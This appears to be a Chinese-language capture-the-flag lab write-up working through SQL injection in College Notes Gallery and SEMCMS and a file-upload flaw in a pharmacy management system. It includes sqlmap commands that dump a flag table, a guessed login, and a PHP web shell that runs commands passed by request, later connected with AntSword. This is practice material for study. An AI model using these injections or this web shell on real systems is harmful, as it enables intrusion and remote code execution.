CVE-2023-7130
靶标介绍:
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.
已经告诉你在哪里存在sql注入了,一般上来应该先目录扫描再进行判断,看是否存在sql注入,这里就直接进行注入
抓包
保存到5.txt中
sqlmap -r 5.txt --batch --dbs
sqlmap -r 5.txt --batch -D notes --tables
sqlmap -r 5.txt -batch -D notes -T flllaaaag --columns
sqlmap -r 5.txt -batch -D notes -T flllaaaag -C flag --dump
CVE-2023-48864
靶标介绍:
SEMCMS是一套支持多种语言的外贸网站内容管理系统(CMS)。SEMCMS v4.8版本存在安全漏洞,该漏洞源于通过 /web_inc.php 中的 languageID 参数发现包含 SQL 注入漏洞。
存在sql注入
进行目录扫描
dirsearch -u http:// -e*
一一访问后,来到install/安装导向
127.0.0.1
semcms
root
root
安装后会来到日志页面
日志里面有后台地址,登录账号和密码
登录
在产品管理页面随便勾选,选择批量上架,抓包,保存为5.txt
经过测试后发现参数languageID并不是注入点,后面的AID才是注入的点
存在时间盲注,注入点是参数AID
有这四个数据库,爆semcms数据库,得表
可以看到flllaaaag表
得到
CVE-2022-30887
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
目录扫描后什么都没有
判断应该是需要登录进去,但是邮箱不容易爆破,发现最底下Mayurik可以点击,访问
当在最下面点击那些下载按钮后会访问,接着会弹出一个邮箱
mayuri.infospace@gmail.com
密码尝试mayurik,成功登录进去
找到上传界面,上传一句话木马
上传成功
访问该网页后返回config.php页面
说明上传成功,且可以执行
连接蚁剑
连接后全是木马文件,还是不死马,点击一下就复制一份
正常情况下是可以直接访问flag的
尝试官方的POC
POC
上传的木马内容
<?php
if($_REQUEST['s']) {
system($_REQUEST['s']);
} else phpinfo();
?>
上传成功
进行get传参